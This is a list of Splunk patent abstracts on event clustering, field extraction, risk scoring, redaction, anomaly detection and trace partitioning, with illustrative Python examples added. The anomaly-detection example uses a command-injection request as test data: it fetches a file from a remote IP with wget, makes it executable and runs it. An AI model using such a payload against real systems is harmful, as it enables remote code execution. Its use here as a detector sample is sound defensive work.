Clustering events while excluding extracted values

    Publication No.: US11657065B2

    Publication date: 2023-05-23

    Application No.: US17158880

    Filing date: 2021-01-26

    Applicant: SPLUNK INC.

    CPC classification number: G06F16/26

    Abstract: Systems and methods include causing presentation of a first cluster in association with an event of the first cluster, the first cluster from a first set of clusters of events. Each event includes a time stamp and event data. Based on the presentation of the first cluster, an extraction rule corresponding to the event of the first cluster is received from a user. Similarities in the event data between the events are determined based on the received extraction rule. The events are grouped into a second set of clusters based on the determined similarities. Presentation is caused of a second cluster in association with an event of the second cluster, where the second cluster is from the second set of clusters.
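    The two-pass clustering the abstract describes, as an added example that is not code from the patent or from Splunk: events are first clustered on their raw text, then, once the user supplies extraction rules, re-clustered on a template in which every extracted value is replaced by a placeholder. The sample events, the regex rule syntax and the placeholder format are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample events, not taken from the patent: (timestamp, event data).
EVENTS = [
    ("2023-05-23T10:00:01Z", "user=alice action=login src=10.0.0.5 status=success"),
    ("2023-05-23T10:00:02Z", "user=bob action=login src=10.0.0.9 status=success"),
    ("2023-05-23T10:00:03Z", "user=alice action=login src=10.0.0.5 status=failure"),
    ("2023-05-23T10:00:04Z", "user=carol action=logout src=10.0.0.7 status=success"),
    ("2023-05-23T10:00:05Z", "user=bob action=login src=10.0.0.9 status=failure"),
]

# Hypothetical extraction rules "received from the user" after seeing the first
# clusters: regexes whose named groups are the fields being extracted.
USER_RULES = [
    re.compile(r"user=(?P<user>\w+)"),
    re.compile(r"src=(?P<src>[\d.]+)"),
]


def template(event_data, extraction_rules):
    """Cluster key for one event: the raw text with every value captured by an
    extraction rule replaced by a <field> placeholder. Events that differ only
    in extracted values therefore share a key."""
    text = event_data
    for rule in extraction_rules:
        match = rule.search(text)
        if not match:
            continue
        # Replace right-to-left so earlier offsets stay valid after each edit.
        spans = sorted(
            ((match.start(name), match.end(name), name)
             for name in match.groupdict() if match.start(name) != -1),
            reverse=True,
        )
        for start, end, name in spans:
            text = text[:start] + "<" + name + ">" + text[end:]
    return text


def cluster(events, extraction_rules=()):
    """Group events by template; returns {template: [(timestamp, event_data), ...]}."""
    groups = defaultdict(list)
    for timestamp, data in events:
        groups[template(data, extraction_rules)].append((timestamp, data))
    return dict(groups)


def summarize(clusters):
    """One row per cluster for presentation: template, size and a representative
    event (the earliest one), largest clusters first."""
    rows = [(key, len(members), min(members)) for key, members in clusters.items()]
    return sorted(rows, key=lambda row: (-row[1], row[0]))


if __name__ == "__main__":
    first = cluster(EVENTS)               # no rules yet: every event is its own cluster
    second = cluster(EVENTS, USER_RULES)  # after the user supplies extraction rules
    print(len(first), "clusters before;", len(second), "clusters after")
    for key, size, representative in summarize(second):
        print(f"{size:>2}  {key}   e.g. {representative[1]}")
```

    With no rules every event is unique, so the first presentation shows five single-event clusters; once user and src are excluded, the five events collapse into three clusters (successful logins, failed logins, logouts), which is the view an analyst actually wants when hunting for a pattern rather than a particular account.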

    Event selection via graphical user interface control

    Publication No.: US11651149B1

    Publication date: 2023-05-16

    Application No.: US17874046

    Filing date: 2022-07-26

    Applicant: SPLUNK Inc.

    CPC classification number: G06F40/174 G06F16/2477

    Abstract: The technology disclosed relates to formulating and refining field extraction rules that are used at query time on raw data with a late-binding schema. The field extraction rules identify portions of the raw data, as well as their data types and hierarchical relationships. These extraction rules are executed against very large data sets not organized into relational structures that have not been processed by standard extraction or transformation methods. By using sample events, a focus on primary and secondary example events helps formulate either a single extraction rule spanning multiple data formats, or multiple rules directed to distinct formats. Selection tools mark up the example events to indicate positive examples for the extraction rules, and to identify negative examples to avoid mistaken value selection. The extraction rules can be saved for query-time use, and can be incorporated into a data model for sets and subsets of event data.
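    The formulate-and-refine loop with positive and negative examples, as an added example that is not code from the patent or from Splunk: a rule is suggested from one highlighted value, then checked against every example the user marked, so that a rule which grabs the wrong number is caught before it is saved for query time. The access-log samples, the anchor-on-preceding-token heuristic and the failure-report format are assumptions of this example.

```python
import re

# Constructed sample events (not from the patent): access-log lines where the
# HTTP status code and the byte count are both multi-digit numbers.
SAMPLES = [
    "GET /login?user=alice HTTP/1.1 200 512",
    "POST /api/token HTTP/1.1 401 0",
    "GET /img/logo.png HTTP/1.1 200 9031",
]
FIELD = "status"
# Positive examples: (event index, value the user highlighted as the field).
POSITIVE = [(0, "200"), (1, "401")]
# Negative examples: (event index, value the user marked as NOT the field).
NEGATIVE = [(0, "512"), (2, "9031")]


def suggest_rule(event, value, field):
    """Formulate a rule from one positive example: anchor on the token that
    precedes the highlighted value, with digits in the anchor generalised to a
    digit class so HTTP/1.1 and HTTP/2.0 both match, then capture the next token."""
    start = event.index(value)
    tokens = event[:start].split()
    anchor = re.escape(tokens[-1]) if tokens else ""
    anchor = re.sub(r"\d", r"\\d", anchor)
    return anchor + r"\s+(?P<" + field + r">\S+)"


def evaluate_rule(rule, samples, positive, negative, field):
    """Refine step: apply a candidate rule to the sample events and report every
    positive example it misses and every negative example it wrongly selects."""
    compiled = re.compile(rule)
    failures = []

    def extracted(idx):
        match = compiled.search(samples[idx])
        return match.group(field) if match and field in match.groupdict() else None

    for idx, expected in positive:
        got = extracted(idx)
        if got != expected:
            failures.append(("missed positive", idx, expected, got))
    for idx, forbidden in negative:
        got = extracted(idx)
        if got == forbidden:
            failures.append(("selected negative", idx, forbidden, got))
    return failures


# A naive first attempt, "the last number on the line": it picks the byte count.
NAIVE_RULE = r"(?P<status>\d+)\s*$"

if __name__ == "__main__":
    print("naive rule failures:", evaluate_rule(NAIVE_RULE, SAMPLES, POSITIVE, NEGATIVE, FIELD))
    idx, value = POSITIVE[0]
    rule = suggest_rule(SAMPLES[idx], value, FIELD)
    print("suggested rule:", rule)
    print("suggested rule failures:", evaluate_rule(rule, SAMPLES, POSITIVE, NEGATIVE, FIELD))
```

    The negative examples are what make the check meaningful: the naive rule extracts a value for every line, so without the "512 is not a status" markup it would look like it works. Rerun evaluate_rule whenever new sample events are added; a rule that passed on one format may silently select the wrong token on another.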

    Graphical User Interface for Presentation of Network Security Risk and Threat Information

    Publication No.: US20230139000A1

    Publication date: 2023-05-04

    Application No.: US17515328

    Filing date: 2021-10-29

    Applicant: Splunk Inc.

    Abstract: A graphical user interface (GUI) for presentation of network security risk and threat information is disclosed. A listing is generated of incidents identified by use of event data obtained from a networked computing environment. A particular incident is determined to be associated with a risk object, wherein a risk object is a component of the networked computing environment. The listing is populated with a name associated with the risk object. Risk events associated with the incident are determined, wherein each risk event contributes to a risk score for the incident. The risk score indicates a potential security issue associated with the risk object. The listing is populated with the risk score and a summary of the events. An action is associated with the listing, for triggering display of additional information associated with the risk object. The listing can be displayed in a first display screen of the GUI.
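    The listing logic behind that GUI, as an added example that is not code from the patent or from Splunk: risk events are aggregated per risk object, the accumulated score and a summary of the contributing detections populate one listing row, and the row carries a drill-down action returning the underlying events. The risk events, the threshold of 100 and the minimum-distinct-sources gate are assumptions of this example.

```python
from collections import defaultdict

# Constructed risk events (not from the patent). Each detection that fires writes
# one risk event naming the risk object it concerns and the score it contributes.
RISK_EVENTS = [
    {"time": "2023-05-04T09:01:00Z", "risk_object": "host-17", "risk_object_type": "system",
     "source": "Suspicious PowerShell Encoded Command", "risk_score": 40},
    {"time": "2023-05-04T09:03:00Z", "risk_object": "host-17", "risk_object_type": "system",
     "source": "LSASS Memory Access", "risk_score": 50},
    {"time": "2023-05-04T09:05:00Z", "risk_object": "host-17", "risk_object_type": "system",
     "source": "Suspicious PowerShell Encoded Command", "risk_score": 40},
    {"time": "2023-05-04T09:06:00Z", "risk_object": "alice", "risk_object_type": "user",
     "source": "Rare Login Hour", "risk_score": 20},
    {"time": "2023-05-04T09:40:00Z", "risk_object": "alice", "risk_object_type": "user",
     "source": "Rare Login Hour", "risk_score": 20},
]


def build_listing(risk_events, threshold=100, min_sources=2):
    """Aggregate risk events per risk object and emit one listing row per object
    whose accumulated score crosses the threshold. The min_sources gate is an
    assumption added here: it stops one noisy rule that fires repeatedly from
    creating an incident on its own."""
    per_object = defaultdict(list)
    for event in risk_events:
        per_object[(event["risk_object"], event["risk_object_type"])].append(event)

    rows = []
    for (name, object_type), events in per_object.items():
        score = sum(e["risk_score"] for e in events)
        sources = sorted({e["source"] for e in events})
        if score < threshold or len(sources) < min_sources:
            continue
        rows.append({
            "risk_object": name,
            "risk_object_type": object_type,
            "risk_score": score,
            "event_count": len(events),
            "summary": "; ".join(sources),
            # the action associated with the row: drill down into the contributing events
            "drilldown": lambda evs=events: sorted(evs, key=lambda e: e["time"]),
        })
    return sorted(rows, key=lambda row: -row["risk_score"])


if __name__ == "__main__":
    for row in build_listing(RISK_EVENTS):
        print(f'{row["risk_object_type"]}:{row["risk_object"]}  score={row["risk_score"]}  {row["summary"]}')
        for event in row["drilldown"]():
            print("    ", event["time"], event["source"], event["risk_score"])
```

    With these inputs host-17 crosses the threshold (130 points from two distinct detections) while alice does not (40 points from one repeating rule), so the first screen of the GUI shows one incident and the drill-down shows the three events an analyst needs to triage it.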

    SEARCH-TIME FIELD EXTRACTION IN A DATA INTAKE AND QUERY SYSTEM

    Publication No.: US20230134578A1

    Publication date: 2023-05-04

    Application No.: US18078876

    Filing date: 2022-12-09

    Applicant: Splunk Inc.

    Abstract: An improved data intake and query system that can perform and display ingest-time and search-time field extraction, redaction, copy, and/or categorization is described herein. As described herein, ingest-time field extraction, redaction, copy, and/or categorization may refer to field or field value extraction, redaction, copy, and/or categorization that is performed by a log observer system of the data intake and query system on raw machine data as the raw machine data is ingested or received from a publisher. As described herein, search-time field extraction, redaction, copy, and/or categorization may refer to field or field value extraction, redaction, copy, and/or categorization that is performed by the log observer system and/or other components of the improved data intake and query system on historical raw machine data that has already been ingested and indexed by the improved data intake and query system.
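    The difference between ingest-time and search-time processing, as an added example that is not code from the patent or from Splunk: the same extraction, redaction, copy and categorization rules run either once as raw machine data arrives (and change what is indexed) or on a copy of already-indexed events at query time (and change only the query's result). The raw lines, the rule tuple syntax and the masking format are assumptions of this example.

```python
import copy
import re

# Constructed raw machine data (not from the patent). Lines 1 and 2 carry a card
# number that must never reach search users.
RAW_LINES = [
    "ts=2023-05-04T08:00:00Z user=alice action=pay card=4111111111111111 amount=120 status=ok",
    "ts=2023-05-04T08:00:05Z user=bob action=pay card=5500000000000004 amount=9999 status=declined",
    "ts=2023-05-04T08:00:09Z user=alice action=login src=10.0.0.5 status=ok",
]

# The four operations named in the abstract, as (operation, argument) rules.
# The rule syntax is an assumption of this example, not Splunk's.
RULES = [
    ("extract", re.compile(r"user=(?P<user>\S+)")),
    ("extract", re.compile(r"card=(?P<card>\d{13,16})")),
    ("extract", re.compile(r"amount=(?P<amount>\d+)")),
    ("extract", re.compile(r"status=(?P<status>\S+)")),
    ("redact", "card"),
    ("copy", ("user", "actor")),
    ("categorize", ("tier", lambda f: "high" if int(f.get("amount", 0)) >= 1000 else "low")),
]


def mask(value):
    """Keep the last four characters, star out the rest."""
    return "*" * (len(value) - 4) + value[-4:]


def apply_rules(event, rules, rewrite_raw):
    """Run the rules over one event. rewrite_raw=True is ingest-time behaviour:
    a redaction also scrubs the stored raw text. rewrite_raw=False is search-time
    behaviour: only the field values produced for this query are masked."""
    fields = event["fields"]
    for op, arg in rules:
        if op == "extract":
            match = arg.search(event["_raw"])
            if match:
                fields.update({k: v for k, v in match.groupdict().items() if v is not None})
        elif op == "redact" and arg in fields:
            masked = mask(fields[arg])
            if rewrite_raw:
                event["_raw"] = event["_raw"].replace(fields[arg], masked)
            fields[arg] = masked
        elif op == "copy":
            src, dst = arg
            if src in fields:
                fields[dst] = fields[src]
        elif op == "categorize":
            dst, classify = arg
            fields[dst] = classify(fields)
    return event


def ingest(raw_lines, rules):
    """Ingest-time: rules run once as data arrives; what they produce is what gets indexed."""
    return [apply_rules({"_raw": line, "fields": {}}, rules, rewrite_raw=True) for line in raw_lines]


def search(stored, rules):
    """Search-time: rules run over already-indexed events at query time on a copy,
    so the index itself is never changed (late-binding schema)."""
    return [apply_rules(copy.deepcopy(event), rules, rewrite_raw=False) for event in stored]


if __name__ == "__main__":
    stored = ingest(RAW_LINES, [])        # index raw text only
    for hit in search(stored, RULES):     # fields materialised at search time
        print(hit["fields"])
    print("raw still holds the PAN:", "4111111111111111" in stored[0]["_raw"])
    scrubbed = ingest(RAW_LINES, RULES)   # ingest-time redaction
    print("raw after ingest-time redaction:", scrubbed[0]["_raw"])
```

    The caveat a practitioner should take from this: search-time redaction masks what the query returns, but the card number is still in the indexed raw text, so anyone who can read _raw directly, or who writes a different extraction, sees it. Redact secrets at ingest time, where the scrub is permanent; reserve search-time rules for fields you are happy to recompute.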

    Anomaly detection based on predicted textual characters

    Publication No.: US11636311B2

    Publication date: 2023-04-25

    Application No.: US16692144

    Filing date: 2019-11-22

    Applicant: SPLUNK INC.

    Abstract: Described herein is a technology that facilitates the production of and the use of automated datagens for event-based systems. A datagen (i.e., data-generator or data generation system) is a component, module, or subsystem of computer systems that searches, monitors, and analyzes machine data. Existing datagens are not capable of detecting an anomaly in machine data. An anomaly is a variance in the input data stream that exceeds some acceptable amount of deviation from the norm (i.e., standard, expectation, etc.). An embodiment of datagen, in accordance with the technology described herein, detects anomalies in the input machine data.
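    Anomaly detection based on predicted characters, as an added example that is not code from the patent or from Splunk: a character bigram model learns how each character of normal machine data follows the previous one, every new line is scored by how poorly the model predicted its characters, and the acceptable deviation from the norm is set from the training lines' own scores. The sshd-style training lines, the add-one smoothing and the mean-plus-three-standard-deviations threshold are assumptions of this example.

```python
import math
from collections import Counter, defaultdict

# Constructed training data (not from the patent): "normal" machine data lines.
TRAINING = [
    "sshd accepted publickey for alice from 10.0.0.5 port 51234",
    "sshd accepted publickey for bob from 10.0.0.9 port 51240",
    "sshd accepted publickey for carol from 10.0.0.7 port 51301",
    "sshd session opened for user alice",
    "sshd session opened for user bob",
    "sshd session closed for user alice",
    "sshd session closed for user carol",
    "sshd accepted publickey for alice from 10.0.0.5 port 51377",
]
# Constructed lines to score: two resemble the norm, one is a command injection.
CANDIDATES = [
    "sshd accepted publickey for dave from 10.0.0.11 port 51402",
    "sshd session opened for user bob",
    "POST /cgi-bin/;cd${IFS}/tmp;wget${IFS}http://198.51.100.7/x;chmod${IFS}777${IFS}x;./x HTTP/1.1",
]
START = "\x02"  # pseudo-character preceding the first character of every line


def train(lines):
    """Character bigram model: how often each character follows each other one."""
    following = defaultdict(Counter)
    for line in lines:
        prev = START
        for ch in line:
            following[prev][ch] += 1
            prev = ch
    vocab = {ch for counts in following.values() for ch in counts}
    return {"following": dict(following), "vocab_size": len(vocab) + 1}  # +1 for unseen chars


def surprisal(model, line):
    """Mean surprisal in nats per character: how badly the model predicted each
    character from its predecessor. Add-one smoothing gives unseen characters a
    small but nonzero probability instead of an infinite score."""
    total, prev = 0.0, START
    for ch in line:
        counts = model["following"].get(prev, {})
        p = (counts.get(ch, 0) + 1) / (sum(counts.values()) + model["vocab_size"])
        total -= math.log(p)
        prev = ch
    return total / max(len(line), 1)


def calibrate(model, lines, k=3.0):
    """Acceptable deviation from the norm: mean + k population standard
    deviations of the training lines' own scores. With eight training lines no
    single line can sit more than about 2.5 std from their mean, so none of
    them is flagged by its own threshold."""
    scores = [surprisal(model, line) for line in lines]
    mean = sum(scores) / len(scores)
    std = math.sqrt(sum((s - mean) ** 2 for s in scores) / len(scores))
    return mean + k * std


def detect(model, lines, threshold):
    """Return (line, score) for every line scoring above the threshold."""
    scored = ((line, surprisal(model, line)) for line in lines)
    return [(line, score) for line, score in scored if score > threshold]


MODEL = train(TRAINING)

if __name__ == "__main__":
    threshold = calibrate(MODEL, TRAINING)
    for line in CANDIDATES:
        print(f"{surprisal(MODEL, line):5.2f}  {line}")
    print("threshold", round(threshold, 2))
    print("anomalies:", [line for line, _ in detect(MODEL, CANDIDATES, threshold)])
```

    A bigram over characters is deliberately the simplest predictor that works; the injection line scores high because almost every character pair in it (uppercase, braces, dollar signs, slashes) was never seen in the norm. A line for a new user name, dave, pays for a handful of unseen pairs but stays near the training scores. Retrain on a rolling window so that a legitimate change in the log format does not stay anomalous forever.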

    Custom use case framework in computer analytics system

    Publication No.: US11620541B1

    Publication date: 2023-04-04

    Application No.: US16656496

    Filing date: 2019-10-17

    Applicant: Splunk Inc.

    Abstract: A custom use case framework in a computer analytics system is shown and described. The custom use case framework includes a custom model creation wizard interface that guides a user through submitting custom model parameters of a custom model definition. The computing system transforms custom model parameters of the custom model definition into a custom model. The custom model is executed in an analytics system. Thus, one or more embodiments provide a simplified method for a user to generate a custom model that is executable by a computer system.

    Virtual partitioning of a shared message bus

    Publication No.: US11620164B1

    Publication date: 2023-04-04

    Application No.: US17033253

    Filing date: 2020-09-25

    Applicant: Splunk Inc.

    Abstract: According to embodiments, a method for virtual partitioning of data includes receiving a data stream comprising a plurality of traces, each trace comprising a plurality of spans from a plurality of users. The method also includes assigning the plurality of traces of the data stream to a plurality of virtual partitions based on each user of the plurality of users, each virtual partition of the plurality of virtual partitions comprising data of a user of the plurality of users. The method also includes scheduling at least a subset of the plurality of virtual partitions to at least one user partition of a shared topic, the at least one user partition comprising data from at least one virtual partition of at least one user of the plurality of users. The method also includes indexing each user partition of the shared topic based on each user and each virtual partition.
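    The partitioning steps of the abstract, as an added example that is not code from the patent or from Splunk: traces are split into per-user virtual partitions, virtual partitions are scheduled onto the user partitions of one shared topic, and an index records which user's data sits in which partition so a consumer can read one tenant's records without seeing a co-located tenant's. The trace stream, the SHA-256-based placement and the in-memory topic are assumptions of this example.

```python
import hashlib
from collections import defaultdict

# Constructed trace stream (not from the patent): each trace carries spans, and
# each span is tagged with the user (tenant) that produced it.
STREAM = [
    {"trace_id": "t1", "spans": [{"span_id": "a", "user": "acme"}, {"span_id": "b", "user": "acme"}]},
    {"trace_id": "t2", "spans": [{"span_id": "c", "user": "globex"}]},
    {"trace_id": "t3", "spans": [{"span_id": "d", "user": "acme"}, {"span_id": "e", "user": "initech"}]},
    {"trace_id": "t4", "spans": [{"span_id": "f", "user": "initech"}]},
]


def to_virtual_partitions(stream):
    """Assign each trace's spans to the virtual partition of the user that
    produced them. A trace with spans from two users is split: each user's
    virtual partition sees only its own spans."""
    virtual = defaultdict(list)
    for trace in stream:
        by_user = defaultdict(list)
        for span in trace["spans"]:
            by_user[span["user"]].append(span)
        for user, spans in by_user.items():
            virtual[user].append({"trace_id": trace["trace_id"], "spans": spans})
    return dict(virtual)


def schedule(virtual, num_partitions):
    """Schedule virtual partitions onto the user partitions of one shared topic.
    Placement is a stable hash of the user id (an assumption made here), so a
    user's virtual partition always lands on the same physical partition and
    two users may share one. Returns (topic, index) where index maps
    partition -> user -> trace ids."""
    topic = [[] for _ in range(num_partitions)]
    index = defaultdict(lambda: defaultdict(list))
    for user, records in sorted(virtual.items()):
        digest = hashlib.sha256(user.encode()).digest()
        p = int.from_bytes(digest[:8], "big") % num_partitions
        for record in records:
            topic[p].append({"user": user, **record})
            index[p][user].append(record["trace_id"])
    return topic, {p: dict(users) for p, users in index.items()}


def read_virtual_partition(topic, index, user):
    """Consumer side: locate the user's partition through the index and return
    only that user's records, never those of a tenant sharing the partition."""
    for p, users in index.items():
        if user in users:
            return [record for record in topic[p] if record["user"] == user]
    return []


if __name__ == "__main__":
    virtual = to_virtual_partitions(STREAM)
    topic, index = schedule(virtual, num_partitions=4)
    for p, users in sorted(index.items()):
        print("partition", p, {user: ids for user, ids in users.items()})
    print("acme reads:", [r["trace_id"] for r in read_virtual_partition(topic, index, "acme")])
```

    The isolation property worth checking in any such design is that a consumer is only ever handed records filtered by its own user key; the shared physical partition is an efficiency detail, and a reader that consumes topic[p] directly would see every tenant scheduled there.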
